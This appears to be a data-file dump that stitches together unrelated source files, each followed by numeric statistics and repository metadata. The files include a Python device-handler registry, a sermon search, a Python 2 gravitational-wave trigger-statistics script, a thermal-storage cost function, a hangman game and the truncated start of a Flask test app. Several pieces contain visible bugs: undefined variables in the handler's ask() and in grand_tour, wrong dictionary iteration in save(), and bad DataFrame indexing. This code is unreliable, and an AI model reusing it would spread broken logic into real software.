cls.singleton()._handle_reading(device, key, value) @classmethod def device_detected(cls, device): cls.singleton()._device_detected(device) @classmethod def device_removed(cls, device): cls.singleton()._device_removed(device) @classmethod def handle_unknown(cls, address, message): cls.singleton()._handle_unknown(address, message) @classmethod def device_added(cls, device): cls.singleton()._device_added(device) def __init__(self): # Load settings from config self.__handler_factory = HandlerFactory.singleton() handlers = Config.singleton()['handlers'] self._handlers = {} for (name, handler_args) in handlers.items(): if handler_args.get('enabled') is not True: continue try: handler = self.__handler_factory[handler_args['type']](**handler_args) except: logging.exception("Failed to initialise handler of type %s" % handler_args['type']) return logging.debug("Adding handler: " + name) self._handlers[name] = handler def save(self): """ Set config handlers to new settings """ serialised = {name: handler.serialise() for (name, handler) in self._handlers.keys()} Config.singleton()['handlers'] = serialised def list(self): return list(self._handlers.keys()) def add(self, **kw_args): handler = self.__handler_factory[kw_args['type']](**kw_args) self._handlers[kw_args['name']] = handler def remove(self, name): handler = self._handlers[name] del self._handlers[name] handler.destroy() def get(self, name): return self._handlers[name] def _device_detected(self, device): for handler in self._handlers.values(): if handler.enabled is False: continue handler.device_detected(device) def _device_removed(self, device): for handler in self._handlers.values(): if handler.enabled is False: continue handler.device_removed(device) def _device_added(self, device): for handler in self._handlers.values(): if handler.enabled is False: continue handler.device_added(device) def _handle_unknown(self, address, message): for handler in self._handlers.values(): if handler.enabled is False: continue handler.handle_unknown(address, message) def _handle_reading(self, device, key, value): for handler in self._handlers.values(): if handler.enabled is False: continue handler.handle_reading(device, key, value) def _alarm(self, device, key, value, alarm_reason): for handler in self._handlers.values(): if handler.enabled is False: continue handler.alarm(device, key, value, alarm_reason) def ask(self): for handler in self._handlers.values(): if handler.enabled is False: continue handler.ask(device, key, value, alarm_reason)
28.834862
99
0.579542
680
6,286
5.167647
0.161765
0.064883
0.047809
0.047809
0.371372
0.282869
0.246443
0.227092
0.206033
0.206033
0
0
0.318804
6,286
217
100
28.967742
0.820645
0.017022
0
0.369697
0
0
0.043105
0
0
0
0
0
0
1
0.218182
false
0.054545
0.036364
0.036364
0.357576
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
0
0
0
2
e56f721835eeb1c014f7eed61ff0b3aab278b97d
2,313
py
Python
src/controllers/search.py
bcartwri96/sermon-skeleton
0f32e6f7acd5d2d82367b098d97d70a26e42a0fc
[ "MIT" ]
1
2019-01-21T03:11:14.000Z
2019-01-21T03:11:14.000Z
src/controllers/search.py
bcartwri96/sermon-skeleton
0f32e6f7acd5d2d82367b098d97d70a26e42a0fc
[ "MIT" ]
29
2019-01-21T05:48:09.000Z
2022-03-11T23:45:01.000Z
src/controllers/search.py
bcartwri96/sermon-skeleton
0f32e6f7acd5d2d82367b098d97d70a26e42a0fc
[ "MIT" ]
null
null
null
# page designed for the search implementation, to be cleaned up in # the future! import src.models.models as ml import src.scripts.index as scripts from sqlalchemy import and_, or_ def search_master(query, author, book_bible, series): # naive search. check and rank the match as it # appears to relate to title. if not author and not book_bible and not series: res = ml.Sermons.query.filter(ml.Sermons.title.ilike("%"+query+"%")).all() elif author and book_bible and series: book_bible = ml.Books_Bible.query.get(book_bible) author = ml.Authors.query.get(author) series = ml.Sermon_Series.query.get(series) res = ml.Sermons.query.filter(and_((and_((and_(ml.Sermons.book_bible == book_bible, \ ml.Sermons.author == author)), ml.Sermons.sermon_series == series)), \ ml.Sermons.title.ilike("%"+query+"%"))).all() elif author and book_bible: book_bible = ml.Books_Bible.query.get(book_bible) author = ml.Authors.query.get(author) res = ml.Sermons.query.filter(and_(ml.Sermons.book_bible ==book_bible, \ and_(ml.Sermons.title.ilike("%"+query+"%"), \ ml.Sermons.author == author))).all() elif author and series: series = ml.Sermon_Series.query.get(series) author = ml.Authors.query.get(author) res = ml.Sermons.query.filter(and_(ml.Sermons.sermon_series ==series, \ and_(ml.Sermons.title.ilike("%"+query+"%"), \ ml.Sermons.author == author))).all() elif series and book_bible: book_bible = ml.Books_Bible.query.get(book_bible) series = ml.Sermon_Series.query.get(series) res = ml.Sermons.query.filter(and_(ml.Sermons.book_bible ==book_bible, \ and_(ml.Sermons.title.ilike("%"+query+"%"), \ ml.Sermons.sermon_series == series))).all() elif author: author = ml.Authors.query.get(author) res = ml.Sermons.query.filter(ml.Sermons.author == author).all() elif series: series = ml.Sermon_Series.query.get(series) res = ml.Sermons.query.filter(ml.Sermons.sermon_series == series).all() elif book_bible: b = ml.Books_Bible.query.get(book_bible) res = ml.Sermons.query.filter(ml.Sermons.book_bible == b).all() else: res = [] return res
38.55
93
0.651967
322
2,313
4.546584
0.164596
0.153689
0.065574
0.092896
0.756148
0.724044
0.724044
0.604508
0.547131
0.547131
0
0
0.206658
2,313
59
94
39.20339
0.79782
0.064419
0
0.418605
0
0
0.004632
0
0
0
0
0
0
1
0.023256
false
0
0.069767
0
0.116279
0
0
0
0
null
0
0
0
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e5726f32898dbebcb3904086e7f5f0ccc32ada7c
14,414
py
Python
grand_tour.py
reedessick/pointy-Poisson
376fd6054ccac19ac9945c9299dc1a45ecd46fb9
[ "MIT" ]
null
null
null
grand_tour.py
reedessick/pointy-Poisson
376fd6054ccac19ac9945c9299dc1a45ecd46fb9
[ "MIT" ]
null
null
null
grand_tour.py
reedessick/pointy-Poisson
376fd6054ccac19ac9945c9299dc1a45ecd46fb9
[ "MIT" ]
null
null
null
#!/usr/bin/python usage = """grand_tour.py [--options] gps gps gps...""" description="""a script that generates a pointed follow-up of possible auxiliary couplings, sweeping through a variety of windows and snr thresholds""" import numpy as np from laldetchar.idq import idq from laldetchar.idq import event import greedyCI as gci import matplotlib matplotlib.use("Agg") from matplotlib import pyplot as plt from optparse import OptionParser from ConfigParser import SafeConfigParser #================================================= def grand_tour(gps, trgs, trgtype, windows, conf=0.68, plot=False): """ a function that compute the grand tour statistics """ if trgtype == "kw": col = event.col_kw snrkey = 'signif' elif trgtype == "Omicron": col = event.col_snglBurst snrkey = 'snr' else: raise ValueError("do not understand trgtype=%s"%(trgtype)) figax = [] for win in windows: print "window=%.6f"%win ### downelect to only this window trgs = [ trg for trg in trgs if (trg[col['tcent']] >= gps-win) and (trg[col['tcent']] <= gps+win) ] Pvalue = np.infty Snr = None Dt = None Frq = None for snrThr in sorted(list(set([ trg[col[snrkey]] for trg in trgs ]))): ### iterate over all snrs present print "snrThr=%.6f"%snrThr ctrgs = [ trg for trg in trgs if trg[snrkey] >= snrThr ] n = len( ctrgs ) ### number of triggers r = 0.5*n/opts.window ### point estimate of the rate if n: dt = np.array([ctrgs[col['tcent']] for trg in ctrgs]) - gps arg = np.argmin(np.abs(dt)) snr = ctrgs[arg][col[snrkey]] frq = ctrgs[arg][col['fcent']] min_dt = dt[arg] absmin_dt = abs(min_dt) else: min_dt = win snr = None frq = None if r > 0: pvalue = 1 - np.exp(-r*2*absmin_dt) ### cumulative probability of observing min_dt <= observed min_dt | estimated rate, the factor of 2 comes from looking on either side of the specified gps time else: pvalue = 1 ### limit is not great here...need to add CI print "\n\tchannel=%s\n\t-> Ntrg=%d\n\t-> rate=%.9e Hz\n\t-> min_dt=%.9e sec\n\t-> pvalue=%.9e"%(chan, n, r, min_dt, pvalue) r_l, r_h = np.array( gci.poisson_bs(conf, n) ) * 0.5 / win pvalue_l = 1 - np.exp(-r_l*2*absmin_dt) pvalue_h = 1 - np.exp(-r_h*2*absmin_dt) print "\t-> %.5e confidence:\n\t\tlow rate =%.9e Hz\n\t\thigh rate=%.9e Hz\n\t\tlow pvalue =%.9e\n\t\thigh pvalue=%.9e"%(conf, r_l, r_h, pvalue_l, pvalue_h) if pvalue_h < Pvalue: pvalue = pvalue_h Snr = snr Dt = dt Frq = frq ### separate plot for each window ### xaxis : time (relative to gps) ### yaxis SNR ### color = pvalue (upper limit?) if plot: fig = plt.figure() ax = plt.subplot(1,1,1) figax.append( (fig, ax) ) ### plot all triggers # dts = np.array([ trg[col['tcent'] for trg in trgs ]) - gps # snrs = [ trg[col[snrkey]] for trg in trgs ] # frqs = [ trg[col['fcent']] for trg in trgs ] for trg in trgs: dt = trg[col['tcent']] - gps snr = trg[col[snrkey]] frq = trg[col['fcent']] color = snr_map( snr ) ax.plot( dt, frq, markerfacecolor=color, markeredgecolor='none', marker='o', linestyle='none', alpha=0.50, markersize=2 ) ax.set_xlabel( 'time relative to %.6f [sec]'%gps ) ax.set_ylabel( 'frequency [Hz]' ) if Dt: color = snr_map( Snr ) ax.plot( Dt, Frq, markerfacecolor='none', markeredgecolor=color, marker='o', linestyle='none', alpha=1.00, markersize=5 ) ax.text( Dt, Frq, '%.3e'%Pvalue, ha='left', va='center' ) ax.set_xlim(xmin=-win, xmax=win) ymax = 1 maxfrq = max( [ trg[col['fcent']] for trg in trgs ] ) while maxfrq > ymax: ymax *= 2 ax.set_ylim(ymin=0, ymax=ymax) return figax def snr_map( snr ): """ map snr into color """ return 'k' #================================================= parser = OptionParser(usage="", description=description) parser.add_option("-v", "--verbose", default=False, action="store_true") parser.add_option("", "--kwverbose", default=False, action="store_true", help="make the retrieve_kwtrigs() call verbose") parser.add_option("", "--Omicronverbose", dest="overbose", default=False, action="store_true", help="make the retrieve_OmicronTrigs() call verbose") parser.add_option("", "--OfflineOmicronverbose", dest="ooverbose", default=False, action="store_true", help="make the retrieve_OfflineOmicronTrigs() call verbose") parser.add_option("-c", "--config", default="config.ini", type="string") parser.add_option("-o", "--output-dir", default="./", type="string") opts, args = parser.parse_args() if not len(args): if opts.verbose: print "no gps times specified" import sys sys.exit(0) else: args = [float(arg) for arg in args] #================================================= config = SafeConfigParser() config.read(opts.config) conf = config.getfloat('general', 'conf') ifo = config.get('general', 'ifo') windows = sorted([float(l) for l in config.get('general','windows').split()], reverse=True) maxwindow = max(windows) #=========== kwgdsdir = config.get("kleinewelle", "gdsdir") kwbasename = config.get("kleinewelle", "basename") kwstride = config.getint("kleinewelle", "stride") kwchannels = config.get("kleinewelle", "channels").split() for chan in kwchannels: if not config.has_section(chan): raise ValueError("no section for channel=%s found in %s"%(chan, opts.config)) #=========== oogdsdir = config.get('OfflineOmicron', 'gdsdir') oochannels = config.get('OfflineOmicron', 'channels').split() for chan in oochannels: if not config.has_section(chan): raise ValueError('no section for channel=%s in %s'%(chan, opts.config)) #=========== ogdsdir = config.get('Omicron', 'gdsdir') ostride = config.getint('Omicron', 'stride') ochannels = config.get('Omicron', 'channels').split() for chan in ochannels: if not config.has_section(chan): raise ValueError('no section for channel=%s in %s'%(chan, opts.config)) if oochannels and ochannels: print "WARNING: you've specified both Omicron and OfflineOmicron channels. In the event of a conflict, the OfflineOmicron data will be preferred!" #================================================= for gps in args: if opts.verbose: print "gps : %.9f"%(gps) #============================================= # KW triggers #============================================= if kwchannels: ### go find triggers if opts.verbose: print "\tdiscoverying KW triggers within [%.9f, %.9f]"%(gps-maxwindow, gps+maxwindow) kwtrgdict = idq.retrieve_kwtrigs(kwgdsdir, kwbasename, int(np.floor(gps-maxwindow)), 2*maxwindow+1, kwstride, verbose=opts.kwverbose) ### keep only the relevant channels if opts.verbose: print "\tdownselecting to only the following channels:" for chan in kwchannels: print "\t\t%s"%chan kwtrgdict.keep_channels(kwchannels) ### trim the edges kwtrgdict.include([[gps-maxwindow, gps+maxwindow]], tcent=event.col_kw['tcent']) ### ensure we have entries for all requested channels and downselect as needed if opts.verbose: print "\tdownselecting triggers:" for chan in kwchannels: if kwtrgdict.has_key(chan): ### apply windows, thresholds if opts.verbose: print "\t\tchannel=%s, found %d triggers"%(chan, len(kwtrgdict[chan])) signifmin = config.getfloat(chan, "signifmin") signifmax = config.getfloat(chan, "signifmax") kwtrgdict[chan] = [trg for trg in kwtrgdict[chan] if (trg[event.col_kw['signif']] >= signifmin) and (trg[event.col_kw['signif']] <= signifmax) ] fmin = config.getfloat(chan, "fmin") fmax = config.getfloat(chan, "fmax") kwtrgdict[chan] = [trg for trg in kwtrgdict[chan] if (trg[event.col_kw['fcent']] >= fmin) and (trg[event.col_kw['fcent']] <= fmax) ] durmin = config.getfloat(chan, "durmin") durmax = config.getfloat(chan, "durmax") kwtrgdict[chan] = [trg for trg in kwtrgdict[chan] if (trg[event.col_kw['tstop']]-trg[event.col_kw['tstart']] >= durmin) and (trg[event.col_kw['tstop']]-trg[event.col_kw['tstart']] <= durmax) ] else: if opts.verbose: print "\t\tWARNING: channel=%s not found, inserting an empty list"%chan kwtrgdict[chan] = [] if opts.verbose: print "\t\t\tchannel=%s -> %d triggers"%(chan, len(kwtrgdict[chan])) else: kwtrgdict = event.trigdict() #============================================= # Omicron triggers #============================================= if ochannels: if opts.verbose: print "\tdiscovering Omicron triggers within [%.9f, %.9f]"%(gps-maxwindow, gps+maxwindow) otrgdict = idq.retrieve_OmicronTrigs(ogdsdir, ifo, int(np.floor(gps-maxwindow)), 2*maxwindow+1, ostride, ochannels, verbose=opts.overbose) ### trim edges otrgdict.include([[gps-maxwindow, gps+maxwindow]], tcent=event.col_snglBurst['tcent']) ### downselect as needed if opts.verbose: print "\tdownselecting triggers" for chan in ochannels: if otrgdict.has_key(chan): if opts.verbose: print "\t\tchannel=%s, found %d triggers"%(chan, len(otrgdict[chan])) snrmin = config.getfloat(chan, "snrmin") snrmax = config.getfloat(chan, "snrmax") otrgdict[chan] = [trg for trg in otrgdict[chan] if (trg[event.col_snglBurst['snr']] >= snrmin) and (trg[event.col_snglBurst['snr']] <= snrmax) ] fmin = config.getfloat(chan, "fmin") fmax = config.getfloat(chan, "fmax") otrgdict[chan] = [trg for trg in otrgdict[chan] if (trg[event.col_snglBurst['fcent']] >= fmin) and (trg[event.col_snglBurst['fcent']] <= fmax) ] durmin = config.getfloat(chan, "durmin") durmax = config.getfloat(chan, "durmax") otrgdict[chan] = [trg for trg in otrgdict[chan] if (trg[event.col_snglBurst['duration']] >= durmin) and (trg[event.col_snglBurst['duration']] <= durmax) ] else: if opts.verbose: print "\t\tWARNING: channel=%s not found, inserting an empty list"%chan otrgdict[chan] = [] if opts.verbose: print "\t\t\tchannel=%s -> %d triggers"%(chan, len(otrgdict[chan])) else: otrgdict = event.trigdict() #============================================= # OfflineOmicron triggers #============================================= if oochannels: if opts.verbose: print "\tdiscovering OfflineOmicron triggers within [%.9f, %.9f]"%(gps-maxwindow, gps+maxwindow) ootrgdict = idq.retrieve_OfflineOmicronTrigs(oogdsdir, ifo, int(np.floor(gps-opts.window)), 2*opts.window+1, channels=oochannels, verbose=opts.ooverbose) ### trim edges ootrgdict.include([[gps-maxwindow, gps+maxwindow]], tcent=event.col_snglBurst['tcent']) ### downselect as needed if opts.verbose: print "\tdownselecting triggers" for chan in oochannels: if ootrgdict.has_key(chan): if opts.verbose: print "\t\tchannel=%s, found %d triggers"%(chan, len(ootrgdict[chan])) snrmin = config.getfloat(chan, "snrmin") snrmax = config.getfloat(chan, "snrmax") ootrgdict[chan] = [trg for trg in ootrgdict[chan] if (trg[event.col_snglBurst['snr']] >= snrmin) and (trg[event.col_snglBurst['snr']] <= snrmax) ] fmin = config.getfloat(chan, "fmin") fmax = config.getfloat(chan, "fmax") ootrgdict[chan] = [trg for trg in ootrgdict[chan] if (trg[event.col_snglBurst['fcent']] >= fmin) and (trg[event.col_snglBurst['fcent']] <= fmax) ] durmin = config.getfloat(chan, "durmin") durmax = config.getfloat(chan, "durmax") ootrgdict[chan] = [trg for trg in ootrgdict[chan] if (trg[event.col_snglBurst['duration']] >= durmin) and (trg[event.col_snglBurst['duration']] <= durmax) ] else: if opts.verbose: print "\t\tWARNING: channel=%s not found, inserting an empty list"%chan ootrgdict[chan] = [] if opts.verbose: print "\t\t\tchannel=%s -> %d triggers"%(chan, len(ootrgdict[chan])) else: ootrgdict = event.trigdict() #============================================= # combine all trgdicts #============================================= trgdict = event.trigdict() ### add kw triggers trgdict.add( kwtrgdict ) ### add Omicron triggers trgdict.add( otrgdict ) ### add OfflineOmicron triggers trgdict.add( ootrgdict ) #============================================= # cluster triggers? #============================================= print "\n\n\tWARNING: you may want to cluster triggers!\n\n" #============================================= # generate statistics, plots #============================================= if opts.verbose: print "\tcomputing statistics, generating plots" for chan in kwchannels: grand_tour(gps, trgdict[chan][:], "kw", windows, conf=conf) for chan in list(set(ochannels+oochannels)): grand_tour(gps, trgdict[chan][:], "Omicron", windows, conf=conf)
39.275204
211
0.55349
1,677
14,414
4.707215
0.195587
0.025336
0.027869
0.043324
0.46643
0.385989
0.374462
0.357487
0.327591
0.299975
0
0.005275
0.263494
14,414
366
212
39.382514
0.73832
0.124948
0
0.277533
1
0.017621
0.184001
0.006123
0
0
0
0
0
0
null
null
0
0.039648
null
null
0.114537
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
e575c012f08e5a8055664cc644ae83131842c8cb
2,142
py
Python
cea/technologies/thermal_storage.py
VMarty/CityEnergyAnalyst
5ab4385fc008f3b23f5bd5f9ba683d401cfcef38
[ "MIT" ]
1
2018-08-16T14:34:23.000Z
2018-08-16T14:34:23.000Z
cea/technologies/thermal_storage.py
VMarty/CityEnergyAnalyst
5ab4385fc008f3b23f5bd5f9ba683d401cfcef38
[ "MIT" ]
null
null
null
cea/technologies/thermal_storage.py
VMarty/CityEnergyAnalyst
5ab4385fc008f3b23f5bd5f9ba683d401cfcef38
[ "MIT" ]
null
null
null
""" thermal storage """ from __future__ import division import pandas as pd from math import log __author__ = "Thuy-An Nguyen" __copyright__ = "Copyright 2015, Architecture and Building Systems - ETH Zurich" __credits__ = ["Thuy-An Nguyen", "Tim Vollrath", "Jimeno A. Fonseca"] __license__ = "MIT" __version__ = "0.1" __maintainer__ = "Daren Thomas" __email__ = "cea@arch.ethz.ch" __status__ = "Production" # investment and maintenance costs def calc_Cinv_storage(V_tank_m3, locator, config, technology_type): """ calculate the annualized investment cost of a thermal storage tank :param V_tank_m3: storage tank volume :type V_tank_m3: float :returns InvCa: """ if V_tank_m3 > 0: storage_cost_data = pd.read_excel(locator.get_supply_systems(config.region), sheetname="TES") storage_cost_data = storage_cost_data[storage_cost_data['code'] == technology_type] # if the Q_design is below the lowest capacity available for the technology, then it is replaced by the least # capacity for the corresponding technology from the database if V_tank_m3 < storage_cost_data.iloc[0]['cap_min']: V_tank_m3 = storage_cost_data[0]['cap_min'] storage_cost_data = storage_cost_data[ (storage_cost_data['cap_min'] <= V_tank_m3) & (storage_cost_data['cap_max'] > V_tank_m3)] Inv_a = storage_cost_data.iloc[0]['a'] Inv_b = storage_cost_data.iloc[0]['b'] Inv_c = storage_cost_data.iloc[0]['c'] Inv_d = storage_cost_data.iloc[0]['d'] Inv_e = storage_cost_data.iloc[0]['e'] Inv_IR = (storage_cost_data.iloc[0]['IR_%']) / 100 Inv_LT = storage_cost_data.iloc[0]['LT_yr'] Inv_OM = storage_cost_data.iloc[0]['O&M_%'] / 100 InvC = Inv_a + Inv_b * (V_tank_m3) ** Inv_c + (Inv_d + Inv_e * V_tank_m3) * log(V_tank_m3) Capex_a = InvC * (Inv_IR) * (1 + Inv_IR) ** Inv_LT / ((1 + Inv_IR) ** Inv_LT - 1) Opex_fixed = Capex_a * Inv_OM # TODO: make sure the cost of heat pump is added else: Capex_a = 0 Opex_fixed = 0 return Capex_a, Opex_fixed
34.548387
117
0.668067
324
2,142
4
0.37037
0.152778
0.208333
0.131944
0.274691
0.147377
0.112654
0.112654
0.069444
0
0
0.023339
0.219888
2,142
61
118
35.114754
0.752244
0.19141
0
0
0
0
0.128175
0
0
0
0
0.016393
0
1
0.029412
false
0
0.088235
0
0.147059
0
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
2
e577e51b7533e7208a1d0b836b3eb5c9b542e2cf
275
py
Python
authors/apps/articles/migrations/0015_merge_20190122_1103.py
andela/Ah-backend-guardians
cc84c18f7c222bc69cf4a263a1c2296b6d335c8b
[ "BSD-3-Clause" ]
null
null
null
authors/apps/articles/migrations/0015_merge_20190122_1103.py
andela/Ah-backend-guardians
cc84c18f7c222bc69cf4a263a1c2296b6d335c8b
[ "BSD-3-Clause" ]
32
2019-01-09T07:52:32.000Z
2022-01-13T01:01:55.000Z
authors/apps/articles/migrations/0015_merge_20190122_1103.py
andela/Ah-backend-guardians
cc84c18f7c222bc69cf4a263a1c2296b6d335c8b
[ "BSD-3-Clause" ]
3
2019-01-03T12:05:53.000Z
2019-09-24T11:41:14.000Z
# Generated by Django 2.1.5 on 2019-01-22 11:03 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('articles', '0012_auto_20190122_0826'), ('articles', '0014_auto_20190121_1631'), ] operations = [ ]
18.333333
48
0.650909
33
275
5.242424
0.848485
0
0
0
0
0
0
0
0
0
0
0.221698
0.229091
275
14
49
19.642857
0.59434
0.163636
0
0
1
0
0.27193
0.201754
0
0
0
0
0
1
0
false
0
0.125
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e57e90edde840704d0ec943f37c0d9761a6a388d
2,289
py
Python
testcube_client/utils.py
tobyqin/testcube-client
be0fdf7436a527b4ad786f1b158f121f5d1b251e
[ "MIT" ]
1
2017-07-25T14:05:16.000Z
2017-07-25T14:05:16.000Z
testcube_client/utils.py
tobyqin/testcube-client
be0fdf7436a527b4ad786f1b158f121f5d1b251e
[ "MIT" ]
17
2018-06-25T01:43:48.000Z
2018-11-15T13:21:53.000Z
testcube_client/utils.py
tobyqin/testcube-client
be0fdf7436a527b4ad786f1b158f121f5d1b251e
[ "MIT" ]
1
2020-05-11T09:07:08.000Z
2020-05-11T09:07:08.000Z
import json import logging from os import environ from os.path import basename, getsize, getmtime, splitext, exists import arrow from .settings import config def env_to_json(): """convert current env variables to json text.""" return json.dumps(dict(environ)) def get_default_run_name(): """try to get run name for jenkins job.""" run_name = 'Tests running on {}'.format(config['host']) return environ.get('JOB_NAME', run_name) def get_run_source(): """try to get run source link and name.""" name = 'Jenkins' if environ.get('JENKINS_HOME', None) else 'Build' link = environ.get('BUILD_URL', None) return link, name def get_object_id(object_url): """ 'http://.../api/run/123/' => 123""" url = object_url[:-1] return int(url[url.rindex('/') + 1:]) def get_run_url(run_obj): """ 'http://../api/runs/123/' => http://.../runs/123""" return run_obj['url'].replace('api/', '')[0:-1] def get_result_url(result_obj): """same logic to get result rul.""" return get_run_url(result_obj) def log_params(func): """decorator to debug a function params""" def wrapper(*args, **kwargs): logging.debug("{}(): args={}, kwargs={}".format(func.__name__, args, kwargs)) return func(*args, **kwargs) return wrapper def as_config(name, return_field=None): """decorator to save function result as config""" def wrapper(func): def _wrapper(*args, **kwargs): result = func(*args, **kwargs) config[name] = result return result[return_field] if return_field else result return _wrapper return wrapper def get_file_info(file_path): valid_file_types = ['.png', '.jpg', '.jpeg', '.bmp', '.gif', '.txt', '.log', '.csv'] if not exists(file_path): logging.error('File not found: {}'.format(file_path)) elif splitext(file_path)[1].lower() not in valid_file_types: logging.error('Invalid file type: {}'.format(splitext(file_path)[1])) elif getsize(file_path) == 0: logging.error('File is empty: {}'.format(file_path)) else: return {'name': basename(file_path), 'file_byte_size': getsize(file_path), 'file_created_time': str(arrow.get(getmtime(file_path)))}
27.25
88
0.63128
313
2,289
4.434505
0.325879
0.057637
0.011527
0.01585
0
0
0
0
0
0
0
0.010468
0.207077
2,289
83
89
27.578313
0.75427
0.13543
0
0.042553
0
0
0.113636
0
0
0
0
0
0
1
0.255319
false
0
0.12766
0
0.638298
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
e580d01d3aa8a72e3c26bf42ef6e06a1887e8fa9
4,584
py
Python
game.py
INE-UFSC/jogo-da-forca-grupo-2-2021-2-1
ed14d6705128c43c253464a209e67fcdd7fb4dfe
[ "MIT" ]
1
2021-11-09T17:46:22.000Z
2021-11-09T17:46:22.000Z
game.py
INE-UFSC/jogo-da-forca-grupo-2-2021-2-1
ed14d6705128c43c253464a209e67fcdd7fb4dfe
[ "MIT" ]
null
null
null
game.py
INE-UFSC/jogo-da-forca-grupo-2-2021-2-1
ed14d6705128c43c253464a209e67fcdd7fb4dfe
[ "MIT" ]
2
2021-11-01T15:08:52.000Z
2021-11-01T16:19:53.000Z
import os def _verify_endgame(word, check_word_in_used_letters, num_lifes): word_only_alpha = [c.lower() for c in word if c.isalpha()] if check_word_in_used_letters == len(word_only_alpha): print('> Parabéns você venceu') return True if num_lifes == 0: print('> Acabaram suas chances') return True else: return False def _print_word_status(word, num_lifes, used_letters): if num_lifes == 6: print(' ______ ') print(' / | ') print(' | ') print(' | ') print(' | ') print(' | ') print(' ') elif num_lifes == 5: print(' ______ ') print(' / | ') print(' | O ') print(' | ') print(' | ') print(' | ') print(' ') elif num_lifes == 4: print(' ______ ') print(' / | ') print(' | O ') print(' | I ') print(' | I ') print(' | ') print(' ') elif num_lifes == 3: print(' ______ ') print(' / | ') print(' | O ') print(' | / I ') print(' | I ') print(' | ') print(' ') elif num_lifes == 2: print(' ______ ') print(' / | ') print(' | O ') print(' | / I \ ') print(' | I ') print(' | ') print(' ') elif num_lifes == 1: print(' ______ ') print(' / | ') print(' | O ') print(' | / I \ ') print(' | I ') print(' | / ') print(' ') elif num_lifes == 0: print(' ______ ') print(' / | ') print(' | O ') print(' | / I \ ') print(' | I ') print(' | / \ ') print(' ') print('# Palavra secreta: ', end='') for i in word: if i in used_letters: print(f'{i}', end='') elif not i.isalpha(): print(f'{i}', end='') else: print(' _', end='') print('') print(f'# Você tem {num_lifes} chances') print('# Letras ja digitadas: ', end='') for i in used_letters: print(i, end=', ') print('\n') def _get_letter(used_letters): while True: last_letter = input('Digite uma letra: ').upper()[0] if last_letter in used_letters: print('> A letra já foi selecionada\n') elif not last_letter.isalpha(): print('> Caracter invalido\n') else: os.system('cls' if os.name == 'nt' else 'clear') return last_letter def play(word): # Function that has the logic of the game # Checks if the letter typed matches the word # And gives feedback to the player according to the result num_lifes = 6 used_letters = [] _print_word_status(word, num_lifes, used_letters) while True: flag_correct_letter_attempt = False check_word_in_used_letters = 0 last_letter = _get_letter(used_letters) used_letters.append(last_letter) for i in word: if i == last_letter: flag_correct_letter_attempt = True if i in used_letters: check_word_in_used_letters += 1 if not flag_correct_letter_attempt: num_lifes -= 1 print('> Você errou a letra') if _verify_endgame(word, check_word_in_used_letters, num_lifes): break _print_word_status(word, num_lifes, used_letters) _print_word_status(word, num_lifes, used_letters)
32.510638
78
0.378272
389
4,584
4.118252
0.246787
0.174782
0.131086
0.06367
0.458802
0.374532
0.348939
0.308989
0.268414
0.268414
0
0.005864
0.516361
4,584
140
79
32.742857
0.716734
0.030541
0
0.5625
0
0
0.349324
0
0
0
0
0
0
1
0.035714
false
0
0.008929
0
0.080357
0.598214
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
2
e5911b5f19f89ac5924d1aa8f1aebc4e4604c187
57
py
Python
pytest_monitor/__init__.py
ErnestinaQiu/pytest-monitor
8e0fe5291acd94d301a66c75977d030f7ec135a7
[ "MIT" ]
null
null
null
pytest_monitor/__init__.py
ErnestinaQiu/pytest-monitor
8e0fe5291acd94d301a66c75977d030f7ec135a7
[ "MIT" ]
null
null
null
pytest_monitor/__init__.py
ErnestinaQiu/pytest-monitor
8e0fe5291acd94d301a66c75977d030f7ec135a7
[ "MIT" ]
null
null
null
__version__ = "1.6.3" __author__ = "Jean-Sebastien Dieu"
19
34
0.719298
8
57
4.125
1
0
0
0
0
0
0
0
0
0
0
0.06
0.122807
57
2
35
28.5
0.6
0
0
0
0
0
0.421053
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e5b8e22d994c4f8741461972d6a0873b7bd9c9db
9,962
py
Python
test/cluster/keytar/keytar.py
llhhbc/vitess
413af7abeec2ef15f8099809de46d8d429fbf193
[ "Apache-2.0" ]
15
2018-04-26T07:39:29.000Z
2020-07-05T03:14:19.000Z
test/cluster/keytar/keytar.py
llhhbc/vitess
413af7abeec2ef15f8099809de46d8d429fbf193
[ "Apache-2.0" ]
21
2017-08-04T19:21:09.000Z
2020-08-06T21:08:12.000Z
test/cluster/keytar/keytar.py
llhhbc/vitess
413af7abeec2ef15f8099809de46d8d429fbf193
[ "Apache-2.0" ]
4
2018-04-26T07:26:00.000Z
2018-06-28T13:27:52.000Z
#!/usr/bin/env python # Copyright 2017 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Keytar flask app. This program is responsible for exposing an interface to trigger cluster level tests. For instance, docker webhooks can be configured to point to this application in order to trigger tests upon pushing new docker images. """ import argparse import collections import datetime import json import logging import os import Queue import shutil import subprocess import tempfile import threading import yaml import flask app = flask.Flask(__name__) results = collections.OrderedDict() _TEMPLATE = ( 'python 